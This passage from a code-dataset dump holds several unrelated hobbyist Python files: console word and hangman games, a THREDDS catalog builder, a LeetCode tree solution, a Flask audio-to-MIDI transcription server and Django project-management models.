\"\"\r\nhint = \"\"\r\n\r\ndef set_word():\r\n global words, word, hint, keys, user_valid_plays\r\n word = random.choice(keys)\r\n hint = random.choice(words[word])\r\n user_valid_plays = []\r\n x = 0\r\n\r\ndef settings():\r\n global tries\r\n do = input(\"What level of this game do you wish to play:\\n 1. Easy Level\\n 2. Medium Level\\n 3. Hard Level\\n : \")\r\n if do == \"1\":\r\n tries = 5\r\n elif do == \"2\":\r\n tries = 3\r\n elif do == \"3\":\r\n tries = 1\r\n else:\r\n print(\"Invalid option.\")\r\n qit = input(\"Do you wish to quit?\\n 1. Yes\\n 2. No\\n : \")\r\n if qit == \"1\":\r\n quit()\r\n else:\r\n settings()\r\n game()\r\n\r\ndef is_complete():\r\n global user_valid_plays, word\r\n for w in word:\r\n if w.lower() not in user_valid_plays:\r\n return False\r\n return True\r\n \r\ndef print_dashes():\r\n global word, user_valid_plays\r\n for i in word:\r\n if i.lower() in user_valid_plays:\r\n print(i,end=\" \")\r\n else:\r\n print(\"_\",end=\" \")\r\n print(\"\")\r\n\r\ndef game(): \r\n global x, points, tries\r\n name = input(\"Input your player name: \")\r\n try:\r\n scores[name]\r\n except:\r\n scores[name] = 0\r\n \r\n attempts = tries\r\n set_word()\r\n print_dashes()\r\n print(\"Hint:\",hint)\r\n while attempts > 0:\r\n if not is_complete():\r\n guess = input(\"Guess a letter in this word: \").strip().lower()\r\n if len(guess) > 1:\r\n attempts = attempts - 1\r\n print(\"Input one letter at a time... You have\",attempts,\"tries left\")\r\n elif guess in word.lower():\r\n user_valid_plays.append(guess)\r\n print(\"This letter is in the word\") \r\n else:\r\n attempts = attempts - 1\r\n print(\"The letter is not a in the word... You have\",attempts,\"tries left\")\r\n if attempts == 0:\r\n print(\"The word is:\",word)\r\n again()\r\n print_dashes()\r\n points = attempts\r\n else:\r\n print(\"CONGRATULATIONS!!!\")\r\n scores[name] += points\r\n again()\r\n \r\n\r\ndef leaderboard():\r\n global points, scores, name\r\n print(\">>>>>LEADERBOARD<<<<<\")\r\n print(\"PLAYER NAME\\t|\\tSCORE\")\r\n \r\n sx = list(scores.values())\r\n \r\n sy = []\r\n for s in sx:\r\n if s not in sy:\r\n sy.append(s)\r\n \r\n sy.sort(reverse=True)\r\n\r\n for y in sy:\r\n for s in scores.items():\r\n if s[1] == y:\r\n print(f\"{s[0]} \\t\\t | \\t {s[1]}\")\r\n #print(scores.items())\r\n \r\ndef again():\r\n global tries, x\r\n again = input(\"Do you wish to:\\n 1. Play again.\\n 2. Go to main menu.\\n 3. Quit\\n : \")\r\n if again == \"1\":\r\n game()\r\n elif again == \"2\":\r\n opt()\r\n elif again == \"3\":\r\n quit()\r\n else:\r\n print(\"Invalid option.\")\r\n qit = input(\"Do you wish to quit?\\n 1. Yes\\n 2. No\\n : \")\r\n if qit == \"1\":\r\n quit()\r\n else:\r\n opt()\r\n\r\ndef addList():\r\n word = input(\"Input the word to be added: \")\r\n hint = input(\"Input the hint to be added: \")\r\n words.update({word: hint})\r\n input(\"Press Enter\")\r\n print(f\"Word: {word} \\t|\\t Hint: {hint}\\n\")\r\n opt()\r\n\r\ndef opt():\r\n global tries, x\r\n do = input(\"Do you wish to:\\n 1. Play a new game.\\n 2. Go to settings.\\n 3. Check leaderboard\\n 4. Add a word\\n : \")\r\n if do == \"1\":\r\n print(\"NOTE: This game will automaticlly start from the easy level.\\nHowever you can change this in settings.\")\r\n input(\"Press Enter\")\r\n tries = 5\r\n game()\r\n elif do == \"2\":\r\n settings()\r\n elif do == \"3\":\r\n leaderboard()\r\n elif do == \"4\":\r\n addList()\r\n else:\r\n print(\"Invalid option.\")\r\n qit = input(\"Do you wish to quit?\\n 1. Yes\\n 2. No\\n : \")\r\n if qit == \"1\":\r\n quit()\r\n else:\r\n opt()\r\n \r\n#def name():\r\n #name = input(\"Input your player name: \")\r\n \r\ntry:\r\n print(\">>>>>Guess the Word<<<<<\")\r\n opt()\r\nexcept:\r\n print(\"Code Error... Restart this program\")\r\n input(\"Press Enter\")\r\n opt()\r\n \r\n","repo_name":"mistlebeehyper/Python-Codes","sub_path":"Game 2.py","file_name":"Game 2.py","file_ext":"py","file_size_in_byte":5473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10681054272","text":"# encoding: utf-8\n\"\"\"\n\n\"\"\"\n__author__ = 'Richard Smith'\n__date__ = '25 Feb 2020'\n__copyright__ = 'Copyright 2018 United Kingdom Research and Innovation'\n__license__ = 'BSD - see LICENSE file in top-level package directory'\n__contact__ = 'richard.d.smith@stfc.ac.uk'\n\nfrom tds_utils.create_catalog import CatalogBuilder, AccessMethod, DatasetRoot, AvailableServices, Aggregation, get_catalog_name, CatalogRef\nfrom collections import namedtuple\nimport os\nfrom jinja2 import Environment, PackageLoader\n\n\n# Not used?\nProperty = namedtuple('Property', ('name', 'value'))\nVariable = namedtuple('Variable', ['name', 'vocabulary_name', 'units'])\n\n\nclass Dataset:\n \"\"\"\n Not used?\n \"\"\"\n\n def __init__(self, id, name=None, urlpath=None, properties=[], access_methods=[], size=None):\n self.name = name if name else id\n self.id = id\n self.urlpath = urlpath\n self.properties = properties\n self.access_methods = access_methods\n self.dataSize = size\n\n\nclass CCICatalogBuilder(CatalogBuilder):\n DS_ROOT = 'esg_esacci'\n\n def __init__(self):\n super().__init__()\n self.env = Environment(loader=PackageLoader(\"cci_publisher\", \"templates\"))\n self.env.trim_blocks = True\n self.env.lstrip_blocks = True\n\n def create_dataset(self, result, file_services):\n \"\"\"\n Not used?\n\n :param result:\n :param file_services:\n :return:\n \"\"\"\n this_id = result['name']\n\n # Going from [1:] to remove the first slash\n url_path = os.path.join(self.DS_ROOT, result['directory'][1:], this_id)\n a_meths = [AccessMethod(s, url_path, \"NetCDF-4\") for s in file_services]\n\n size = result['size']\n\n dataset = Dataset(id=this_id, access_methods=a_meths, size=size)\n\n return dataset\n\n def dataset_catalog(self, ds_id, opendap=False):\n \"\"\"\n Build a THREDDS catalog and return the XML as a string\n\n :param ds_id: DRS ID\n :type ds_id: str\n\n :param opendap: Whether or not the service is available via opendap\n :type opendap: bool\n\n :return: XML string\n :rtype: string\n \"\"\"\n # Work out which services are required\n file_services = {AvailableServices.HTTP.value}\n aggregation = None\n\n if opendap:\n file_services.add(AvailableServices.OPENDAP.value)\n\n all_services = file_services.copy()\n\n context = {\n \"services\": all_services,\n \"dataset_id\": ds_id,\n \"aggregation\": aggregation,\n }\n\n return self.render(\"dataset_catalog.xml\", **context)\n\n def root_catalog(self, cat_paths, root_dir, name=\"THREDDS catalog\"):\n \"\"\"\n Build a root-level catalog that links to other catalogs, and return the\n XML as a string\n\n :param cat_paths: paths to dataset xml records\n :type cat_paths: list\n\n :param root_dir: the location of the root catalog.xml\n :type root_dir: str\n\n :param name: name of root catalog\n :type name: str\n\n :return: XML String\n :rtype: str\n \"\"\"\n catalogs = []\n\n for path in cat_paths:\n cat_name = get_catalog_name(path)\n\n # href must be relative to the root catalog itself\n href = os.path.relpath(path, start=root_dir)\n catalogs.append(CatalogRef(name=cat_name, title=cat_name,\n href=href))\n\n return self.render(\"root_catalog.xml\", name=name, catalogs=catalogs)","repo_name":"cedadev/cci-publisher","sub_path":"cci_publisher/datasets/create_catalog.py","file_name":"create_catalog.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33364207586","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nfrom collections import deque\n\nclass Solution:\n def __init__(self) :\n self.preorder_index = 0\n self.preorder = None\n\n def buildTree(self, preorder: List[int], inorder: List[int]) -> Optional[TreeNode]:\n\n hashmap = {num : i for i, num in enumerate(inorder)}\n self.preorder = preorder\n\n def _buildTree(left, right) :\n if left > right :\n return\n\n rootval = self.preorder[self.preorder_index]\n root = TreeNode(rootval)\n\n self.preorder_index += 1 \n\n next_right = hashmap[rootval]\n root.left = _buildTree(left, next_right - 1)\n root.right = _buildTree(next_right + 1, right)\n\n return root\n \n return _buildTree(0, len(inorder) - 1)\n","repo_name":"watanka/leetcode","sub_path":"0105-construct-binary-tree-from-preorder-and-inorder-traversal/0105-construct-binary-tree-from-preorder-and-inorder-traversal.py","file_name":"0105-construct-binary-tree-from-preorder-and-inorder-traversal.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23999047907","text":"from __future__ import unicode_literals\nfrom concurrent.futures import process\nfrom flask import Flask, jsonify, render_template, request,json,send_from_directory, flash, url_for, redirect, session,send_file,redirect\nfrom flask_wtf import FlaskForm\nfrom wtforms import SelectField,HiddenField,SubmitField,FieldList,FormField\nimport vamp\nimport librosa\nimport ffmpeg\nimport os\nimport pyin\nimport subprocess\nimport pretty_midi\nfrom madmom.features.downbeats import DBNDownBeatTrackingProcessor,RNNDownBeatProcessor\nimport pandas as pd\nfrom functools import wraps\nfrom wtforms import Form, BooleanField, TextField, PasswordField, validators,RadioField\nimport gc\nimport math\nimport requests\nimport sys,traceback\nfrom pathlib import Path\nimport pydub\nfrom pydub import AudioSegment\nfrom IPython.display import Audio\nimport numpy as np\nimport scipy as sp\nimport scipy.signal\nfrom scipy.io.wavfile import write\nimport os.path\nimport time\n\n\n# from spleeter.separator import Separator\n\n\napp = Flask(__name__)\napp.config['SESSION_TYPE'] = 'memcached'\napp.config['SECRET_KEY'] = 'pretty secret key'\nUPLOAD_FOLDER = './static/audio_uploads'\nSTEMS_FOLDER = './static/stems'\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\napp.config['STEMS_FOLDER'] = STEMS_FOLDER\n#dev_mode = 'TRUE'\n#print(\"fn \",Flask(__name__))\n\n\n# @app.route('/api/<filepath>/')\n# def api_get_filepath(filepath):\n# return json.jsonify({\n# 'filepath': filepath\n# })\n\ndef separate_stems(filePath,fileName):\n print(\"\\nseparating stems\")\n # sep = Separator('spleeter:2stems')\n print(\"separator ran\")\n # sep.separate_to_file(file_path,output_path,codec='mp3')\n print(\"we do be having issues if this doesnt show\")\n\n outputPath = \"C:/Users/Duncan Hanson/Documents/GitHub/capstone2/separated/mdx_q/\" + fileName.replace(\".wav\", \"\") + \"/bass.wav\"\n\n print(filePath)\n\n # WE USE SUBPROCESS NOW::\n\n demucsCommand = \"demucs -d cpu -n mdx_q \"\n\n subprocess.run(demucsCommand+filePath)\n\n return(outputPath)\n\n # return render_template('play_audio.html',filename=filePath)\n\n\n\n # subprocessCommand = \"spleeter separate -p spleeter:4stems -o output/ \"\n # print(filePath)\n # print(subprocessCommand+filePath)\n # subprocess.run(subprocessCommand+filePath)\n\n # if __name__ == \"__main__\": \n # separator = Separator('spleeter:2stems')\n # separator.separate_to_file(filePath, outputPath)\n # print('sep is running')\n\n # print('subprocess is done now')\n# @app.route(\"/change_audio\")\n# def change_audio(filePath, sample):\n# return filePath, sample\n\n\n#reading in stems from demucs separation\n\ndef bass_stem_definitions(path_to_bass,path_to_orig):\n [stem,sr1] = librosa.load(path_to_bass) #### path for bass stem\n [original,sr2] = librosa.load(path_to_orig) #### path for whole song\n\n #lowpass filter to remove extraneous signal noise\n lowpass = scipy.signal.butter(2, 5000, 'lowpass', fs=sr1, output='sos')\n filtered = scipy.signal.sosfilt(lowpass, stem)\n return filtered, original,sr1\n\n\ndef vocals_stem_definitions(path_to_vocals,path_to_orig):\n [stem,sr1] = librosa.load(path_to_vocals) #### path for vocals stem\n [original,sr2] = librosa.load(path_to_orig) #### path for whole song \n\n #highpass filter to remove extraneous signal noise\n highpass = scipy.signal.butter(2, 5000, 'highpass', fs=sr1, output='sos')\n filtered = scipy.signal.sosfilt(highpass, stem)\n return filtered, original,sr1\n\n\n#process single wav pyin\ndef process_video(videoid):\n \n base_fn = videoid \n #decode_fn = 'C:/Users/Duncan Hanson/Documents/GitHub/capstone2/static/stems/bass.wav'\n print(\"base_fn: \", base_fn)\n try:\n data,rate = librosa.load(base_fn)\n except Exception as bad_file:\n print(bad_file)\n return \"failure1\"\n \n melody = vamp.collect(data,rate,\"pyin:pyin\")\n parm = {}\n #plugin, step_size, block_size = vamp.load.load_and_configure(data, rate, \"mtg-melodia:melodiaviz\",parm)\n plugin, step_size, block_size = vamp.load.load_and_configure(data, rate, \"pyin:pyin\",parm)\n output_desc = plugin.get_output(5)\n print(\"od\",output_desc)\n output = output_desc[\"identifier\"]\n ff = vamp.frames.frames_from_array(data, step_size, block_size)\n results = vamp.process.process_with_initialised_plugin(ff, rate, step_size, plugin, [output])\n print(\"results:\", results)\n melody_tmp_fn = base_fn + \".lab\"\n print(\"melody_tmp: \", melody_tmp_fn)\n outfile = open(melody_tmp_fn,'w') \n try:\n result = next(results)\n except Exception as ex:\n print(\"failure2\",ex)\n return \"failure3\" \n\n while True:\n \n start = str(result['notes']['timestamp'])\n freq = result['notes']['values'][0]\n note_nbr = midi = str(round(69 + 12*np.log2(freq/440.)))\n duration = str(result['notes']['duration']) \n if result['notes']['values'].shape[0] > 1:\n print(\"multiple notes\",videoid)\n outfile.write(start + '\\t' + duration + '\\t' + note_nbr + '\\n')\n #print(\"??\",start + '\\t' + duration + '\\t' + note_nbr + '\\n')\n try:\n \n result = next(results) \n \n except:\n #outfile.write(start + '\\t' + duration + '\\t' + note_nbr )\n break\n \n outfile.close()\n\n\n #infile = melody_tmp_fn\n #melody_fn = base_fn + '.lab' \n #audio_to_midi_melodia(infile, melody_fn, 95)\n \n \n return melody_tmp_fn\n\n\n#convert pyin to midi\ndef convert_to_midi(note_matrix):\n song1 = pretty_midi.PrettyMIDI()\n # Create an Instrument instance for a cello instrument\n song1_program = pretty_midi.instrument_name_to_program('Acoustic Grand Piano')\n piano = pretty_midi.Instrument(program=song1_program)\n for row in note_matrix:\n song_id = row[0]\n note_number = int(row[3])\n start_time = float(row[1])\n end_time = float(row[2])\n note = pretty_midi.Note(velocity=100, pitch=note_number, start=start_time, end=end_time)\n piano.notes.append(note)\n song1.instruments.append(piano)\n # Write out the MIDI data\n song1.write(song_id + '_midi.mid')\n\n return 'success'\n\n#Get song data and beat tracker\ndef get_song_data(track_id,videoid):\n \n print(\"song_id \",track_id)\n base_fn = videoid\n ###### Figure out the name of the file to open based on the track_id supplied\n fn = track_id\n transcription_file = open(fn)\n pitch_vector=[]\n midipitches = ['C','C#','D','Eb','E','F','F#','G','G#','A','Bb','B']\n for row in transcription_file.readlines():\n row = row.split('\\t')\n start_time = float(row[0].strip(\" \"))\n end_time = start_time + float(row[1].strip(\" \"))\n duration = end_time - start_time\n note_nbr = int(row[2].strip(\"\\n\"))\n pcname = midipitches[note_nbr % 12]\n octave = int((note_nbr / 12) + 1)\n pitch_vector.append([start_time,duration,note_nbr,pcname,octave])\n pitchdf = pd.DataFrame(pitch_vector,columns=['start','duration','notenbr','pcname','octave'])\n \n\n beat_vector = []\n nbrbeats = 0\n\n ######need to implement madmom beat tracker to get bpm\n ######read beat tracker file to get beats \n\n #beat_fn = './capstone2/madmombeats/' + videoid.replace(\"C:/Users/Duncan Hanson/Documents/GitHub/capstone2/separated/mdx_q/Black_Water\", \"\") + '.lab'\n proc = DBNDownBeatTrackingProcessor(beats_per_bar=[3,4], fps=100)\n act = RNNDownBeatProcessor()(base_fn)\n beatarray = proc(act) \n print(\"out \",beatarray)\n #outfile = open(beat_fn,'w')\n x = 0\n firststart = 0\n\n #for c in beatarray:\n #if x == 0:\n #firststart = c[0]\n #x += 1\n #continue\n #outfile.write(str(np.round(firststart,2)))\n #outfile.write('\\t')\n #firststart = c[0]\n #outfile.write(str(np.round(c[0],2)))\n #outfile.write('\\t')\n #outfile.write(str(np.round(c[1],2)))\n # outfile.write('\\t')\n\n #if x < len(beatarray) -1:\n # outfile.write('\\n')\n # x += 1\n # outfile.close()\n\n \n previous_start = 0\n for row in range(len(beatarray)):\n if row == 0:\n previous_start = float(beatarray[row][0])\n beat_vector.append([float(beatarray[row][0]),float(0),beatarray[row][1],'beat'])\n nbrbeats += 1\n else:\n previous_start = float(beatarray[row-1][0])\n beat_vector.append([float(beatarray[row][0]),float(beatarray[row][0])-previous_start,beatarray[row][1],'beat'])\n nbrbeats += 1\n\n beatdf = pd.DataFrame(beat_vector,columns=['start','duration','metric_pos','type'])\n beatdf['duration'].fillna(value=beatdf.duration.mean)\n songlen = beatdf.start.max() + beatdf.duration.iloc[beatdf.start.idxmax()]\n bpm = nbrbeats / (songlen / 60) \n print(\"songlen \", songlen, bpm)\n \n meanbeat = beatdf['duration'].mean()/4 ##### divide beat into sixteenth notes\n pitchdf['notelen'] = np.ceil(pitchdf['duration'] / meanbeat).astype(int).astype(str) + \"n\"\n pitchdf['16s'] = np.round(pitchdf['start'] / meanbeat)\n pitchdf['notestart'] = np.floor(np.round(pitchdf.start / meanbeat) / 16).astype(int)\n pitchdf['notestart4'] = (np.floor(np.round(pitchdf.start / meanbeat) - (pitchdf.notestart) * 16) / 4).astype(int)\n pitchdf['notestart16'] = (np.round(pitchdf.start / meanbeat) - ((pitchdf.notestart * 16) + (pitchdf.notestart4 * 4 ))).astype(int)\n pitchdf['notestartarray'] = pitchdf['notestart'].map(str) + \":\" + pitchdf['notestart4'].map(str) + \":\" + pitchdf['notestart16'].map(str)\n pitchdf['notename'] = pitchdf['pcname'] + pitchdf['octave'].map(str)\n notearray = pitchdf[['notestartarray','notename','notelen']].to_numpy()\n pitchdf['notearray'] = notearray.tolist()\n print(\"nnn\",pitchdf[['notearray','duration','notelen']].head(10))\n pitchdf.to_json(base_fn + \"_pitchdf.json\")\n print (pitchdf)\n return pitchdf, bpm\n\n\n#if __name__ == '__main__':\n \n #outputpath = separate_stems(UPLOAD_FOLDER,)\n #target_wav = bass_stem_definitions(outputpath,path_to_orig)\n target_wav = 'bass.wav'\n rc = process_video(target_wav)\n print(\"rc\",rc,target_wav)\n\n# if __name__ == \"__main__\":\n# fn = 'C:/Users/Duncan Hanson/Documents/GitHub/capstone2/pyin/basslemon.wav.lab'\n# transcription_file = open(fn)\n# note_matrix = []\n# for row in transcription_file.readlines():\n# row = row.split('\\t')\n# song_id = 'bass'\n# start_time = float(row[0].strip(\" \"))\n# end_time = start_time + float(row[1].strip(\" \"))\n# note_nbr = int(row[2].strip(\"\\n\"))\n# note_matrix.append([song_id,' ',start_time,end_time,note_nbr])\n# # convert_to_midi(note_matrix)\n\n\n@app.route('/audio_file_name')\ndef returnAudioFile(filePath):\n path_to_audio_file = filePath\n return send_file(\n path_to_audio_file, \n mimetype=\"audio/wav\", \n as_attachment=True, \n attachment_filename=\"test.wav\")\n\n@app.route('/upload')\ndef audio_upload():\n return render_template('upload.html')\n\n@app.route(\"/\")\ndef landing_load():\n return render_template(\"melody-editor.html\")\n\n@app.route('/explore')\ndef explore():\n ytid = request.args.get('ytid')\n if ytid == None:\n return render_template('melody-editor.html')\n else:\n return render_template('melody-editor.html',ytid=ytid)\n #return render_template('pixi-explore.html')\n\n@app.route('/get_song',methods=['GET', 'POST'])\ndef create_time_series():\n song_id = request.args.get('song_id')\n song_title = request.args.get('title')\n chord_type = request.args.get('chord_type')\n midi_id = request.args.get('midi_id')\n print(\"midi id \",midi_id)\n songtitles,titleoptions = refresh_song_titles()\n if song_id == None: \n print(\"using title\")\n track_id=songtitles.loc[songtitles.loc[:,'Title']==song_title,'ChordinoFN'].values[0]\n else:\n track_id=songtitles.loc[songtitles.loc[:,'YoutubeID']==song_id,'ChordinoFN'].values[0]\n userid = request.args.get('userid')\n pitchdf,chorddf,secdf,songlen,bpm,beatdf,chordlist = get_song_data(track_id,chord_type,userid,midi_id)\n #firstdownbeat,signature,nbr_sixteenths = get_downbeat(beatdf,chordlist)\n beatlist = beatdf.start.tolist()\n nbr_rows = math.ceil(float(len(beatlist)) / (nbr_sixteenths))\n lyric_lines,lyricdf = get_lyrics(song_id,beatlist,nbr_rows,signature,beatdf)\n #print(\"ldf\",lyricdf)\n lyricl = lyricdf.to_dict(orient='records')\n # if firstdownbeat > 0:\n # emptybeats = [\" \" for i in range(signature - firstdownbeat)]\n # chordlist = emptybeats + chordlist\n # print(\"empty\",emptybeats)\n print(\"cdf\",pitchdf['notearray'].head())\n cdictlist = []\n notelist = pitchdf['notearray'].tolist()\n chord_tone_array = []\n note_index = 0\n note_beat_measure = (int(notelist[note_index][0].split(':')[0]) * signature) + (int(notelist[note_index][0].split(':')[1]))\n \n \n #print(\"chordl\",chordl)\n pitchl = pitchdf.to_dict(orient='records')\n secl = secdf.to_dict(orient='records')\n #print(\"secl \",secl)\n D = {'data1' : pitchl, 'songlen' : songlen, 'bpm' : bpm,\n 'downbeat': str(firstdownbeat), 'signature': str(signature),'lyrics': lyricl,'cta' : chord_tone_array}\n \n return jsonify(D)\n\n\n@app.route(\"/edu\")\ndef edu():\n return render_template(\"edu.html\")\n\n\n\n@app.route('/<path:filename>')\ndef serve_static(filename):\n print('serving static')\n root_dir = app.root_path\n print(\"root \",root_dir,app.root_path,app.instance_path)\n filedir = os.path.join(root_dir, 'static/')\n print(filedir,filename)\n return send_from_directory(os.path.join(root_dir, 'static/'), filename)\n\n\n# @app.route('/play_audio')\n# def play_audio():\n# return render_template('play_audio.html')\n\n@app.route('/save_melody',methods=['GET','POST'])\ndef save_melody():\n request_data = request.get_json(silent = True)\n print(\"requestdata: \",request_data)\n melody_data = request_data[\"melody_data\"]\n song_id = request_data[\"song_id\"]\n print(\"songid:\", song_id)\n note_matrix = []\n for x in range(len(melody_data)):\n end_time = melody_data[x][0] + melody_data[x][1]\n note_nbr = melody_data[x][2]\n note_matrix.append([song_id,melody_data[x][0],end_time,note_nbr])\n convert_to_midi(note_matrix)\n return \"success\"\n\n\n@app.route('/save_audio',methods=['GET','POST'])\ndef save_audio():\n print(\"request title\", request.args.get(\"title\"))\n print(\"request type\", request.args.get(\"type\"))\n file_name = request.args.get(\"title\")\n type = request.args.get(\"type\")\n print(\"filename\", file_name)\n print(\"type\", type)\n\n if file_name != None:\n # this saves audio files into the \"audio_uploads\" folder. we will need to delete these in a cache on the webhosting possibly but for now it works fine\n #audio_file = request.files['audio']\n #print('audiofile: ', audio_file.filename)\n #print('newaudiofile: ', audio_file.filename.replace(\" \",\"_\").replace(\".\",\"_\",audio_file.filename.count(\".\")-1))\n\n #file_id=audio_file.filename.replace(\" \",\"_\").replace(\".\",\"_\",audio_file.filename.count(\".\")-1)\n #print(\"fileid\", file_id)\n # file_path = UPLOAD_FOLDER + \"/\" + file_id\n # output_path = STEMS_FOLDER + \"/\" + file_id\n #orig_file_path = \"C:/Users/Duncan Hanson/Documents/GitHub/capstone2/static/audio_uploads/\"+ file_name + \".wav\"\n \n\n #print(\"file path: \", orig_file_path)\n #print(\"output path\", output_path)\n #audio_file.save(orig_file_path) \n\n # convert file to wav for future use\n\n #orig_file_path = '\"' + orig_file_path + '\"'\n\n #output_path = separate_stems(orig_file_path, file_id)\n #output_path = \"C:/Users/Duncan Hanson/Documents/GitHub/capstone2/separated/mdx_q/Black_Water/other.wav\"\n\n #if \".mp3\" in orig_file_path:\n # print('yes there is mp3 here')\n # sound = AudioSegment.from_mp3(orig_file_path)\n # sound.export(orig_file_path.replace(\".mp3\",\".wav\"), format=\"wav\")\n # file_id = file_id.replace(\".mp3\",\".wav\")\n # orig_file_path = orig_file_path.replace(\".mp3\",\".wav\")\n\n #melody_fn = process_video(output_path)\n #melody_fn = \"C:/Users/Duncan Hanson/Documents/GitHub/capstone2/separated/mdx_q/Black_Water/other.wav.lab\"\n\n #pitch_df,bpm = get_song_data(melody_fn,output_path)\n pitch_df = pd.read_json(\"C:/Users/Duncan Hanson/Documents/GitHub/capstone2/processed/pitchdf/\" + file_name + \"/\" + type + \".wav_pitchdf.json\")\n \n bpm = pitch_df.bpm.mean()\n print(\"bpm: \", bpm)\n\n #name_of_file=file_id.split(\".\")[0]\n #bass_path = 'separated/mdx_q/'+ name_of_file + '/bass.wav'\n #vocals_path = 'separated/mdx_q/'+ name_of_file + '/vocals.wav'\n\n #stereo,sr=binauralizer(alpha,high,bass_path,orig_file_path)\n #binauralized_file_path = 'static/binauralized/' + file_id\n #write(binauralized_file_path,sr,stereo)\n #print(binauralized_file_path)\n pitchl = pitch_df.to_dict(orient='records')\n D = {'data1' : pitchl, 'bpm' : bpm }\n #return render_template('melody-editor.html', ytid=D) \n return jsonify(D) \n \n\n \n # return render_template('play_audio.html', file_path=binauralized_file_path)\n\n\n#testcase \n#process_video(path_to_bass)\n#write(\"stereo.wav\",sr,stereo)\n\n\n\nif __name__ == '__main__':\n #app = Flask(__name__)\n #sess = Session()\n dev_mode = 'TRUE'\n if dev_mode == 'TRUE':\n app.run(host='0.0.0.0',port=8100,debug=True)\n else:\n app.run()\n \n\n\n \n\n \n","repo_name":"dhanson007/MidiMelodyTranscriber","sub_path":"song_upload_server.py","file_name":"song_upload_server.py","file_ext":"py","file_size_in_byte":17683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26663837310","text":"import random\nfrom wordlist import words\nimport string\nimport hangmangraphics\nimport time\nimport sys\n\ndef get_valid_word(words):\n word = random.choice(words)\n while '-' in word or ' ' in word:\n word = random.choice(words)\n return word\n\ndef hangman():\n word = get_valid_word(words).upper()\n word_letters = set(word)\n alphabet = set(string.ascii_uppercase)\n used_letters = set()\n lives = 6\n hangmangraphics.draw_hangman(lives) \n while len(word_letters) > 0 and lives > 0:\n print('You have',lives,' lives and You have used these letters', ' '.join(used_letters))\n\n word_list = [letter if letter in used_letters else '-' for letter in word]\n print('Current word: ', ' '.join(word_list))\n\n user_letter = input('Guess a letter: ').upper()\n if user_letter in alphabet - used_letters:\n used_letters.add(user_letter)\n if user_letter in word_letters:\n word_letters.remove(user_letter)\n else:\n lives = lives - 1\n hangmangraphics.draw_hangman(lives)\n print('this letter is not in the word')\n\n\n elif user_letter in used_letters:\n print('You have used that character before')\n\n else: \n print(\"invalid character, try again\")\n \n if lives == 0:\n print('You didnt guess the word, it was: ',word)\n else:\n print('You guessed it, the word is: ',word,'!')\n\nhangman()\ntime.sleep(5)\nprint(\"Press any key to exit the program\")\ninput()\nexit()","repo_name":"HyperDarkmoon/Hangman-python","sub_path":"hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27569845367","text":"from django.db import models\nfrom account.models import AccountUser, WorkPlace\nfrom django.urls import reverse\nfrom django.template.defaultfilters import slugify\n\nstatus = (\n ('ass', 'Assigned'),\n ('prog', 'In Progress'),\n ('comp', 'Completed'),\n ('test', 'Testing'),\n ('rev', 'Review'),\n ('appr', 'Approved'),\n ('rel', 'Released')\n)\n\n# Create your models here.\n\nclass Project(models.Model):\n workplace_id = models.ForeignKey(WorkPlace, on_delete=models.CASCADE)\n project_manager = models.ForeignKey(AccountUser, on_delete=models.SET_NULL, null=True)\n name = models.CharField(max_length=255)\n date_created = models.DateTimeField(verbose_name='date created', auto_now_add=True)\n slug = models.SlugField(null=False, unique=True)\n\n def __str__(self):\n return self.name\n\n def assigned(self):\n var = Status.objects.get(status='ass')\n return self.tasks_set.filter(status_id_id=var)\n\n def progress(self):\n var = Status.objects.get(status='prog')\n return self.tasks_set.filter(status_id_id=var)\n\n def completed(self):\n var = Status.objects.get(status='comp')\n return self.tasks_set.filter(status_id_id=var)\n\n def testing(self):\n var = Status.objects.get(status='test')\n return self.tasks_set.filter(status_id_id=var)\n\n def review(self):\n var = Status.objects.get(status='rev')\n return self.tasks_set.filter(status_id_id=var)\n\n def approved(self):\n var = Status.objects.get(status='appr')\n return self.tasks_set.filter(status_id_id=var)\n\n def released(self):\n var = Status.objects.get(status='rel')\n return self.tasks_set.filter(status_id_id=var)\n\n def get_absolute_url(self):\n return reverse('projects:project-detail', kwargs={'workplace_id': self.workplace_id, 'slug': self.slug})\n\n def save(self, *args, **kwargs): # new\n if not self.slug:\n self.slug = slugify(self.name)\n return super().save(*args, **kwargs)\n\n\nclass Status(models.Model):\n status = models.CharField(max_length=15, choices=status, null=True, blank=True)\n\n def __str__(self):\n return self.status\n\n\nclass Tasks(models.Model):\n project_id = models.ForeignKey(Project, on_delete=models.CASCADE)\n user_id = models.ForeignKey(AccountUser, on_delete=models.SET_NULL, null=True)\n status_id = models.ForeignKey(Status, on_delete=models.SET_NULL, null=True)\n name = models.CharField(max_length=256)\n date_created = models.DateTimeField(verbose_name='date created', auto_now_add=True)\n\n def __str__(self):\n return self.name\n\n\nclass Logs(models.Model):\n task_id = models.ForeignKey(Tasks, on_delete=models.CASCADE)\n messages = models.TextField()\n date_created = models.DateTimeField(verbose_name='date created', auto_now_add=True)\n\n def __str__(self):\n return self.messages\n","repo_name":"Akoh1/project-management","sub_path":"projects/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27259978802","text":"from collections import defaultdict\nfrom graph import Graph\nimport os\nd = defaultdict(list)\nV, E = [int(x) for x in input('Nhập số đỉnh và cạnh trên một dòng:').split()]\nfor i in range(V):\n d[i] = []\ngraph = Graph(d)\nedges = []\nfor i in range(E):\n\n u, w = [int(x) for x in input('Nhập cạnh %d trên một dòng:' %(i+1)).split()]\n graph.graph[u - 1].append(w - 1)\n graph.graph[w - 1].append(u - 1)\n edge = [u, w]\n edges.append(edge)\n\nout = dict(zip(range(V), [0]*V))\nlayers = graph.bfs(0)\nis_even = 0\ncolors = [0, 1]\n\nfor i in layers:\n for ii in i:\n out[ii] = 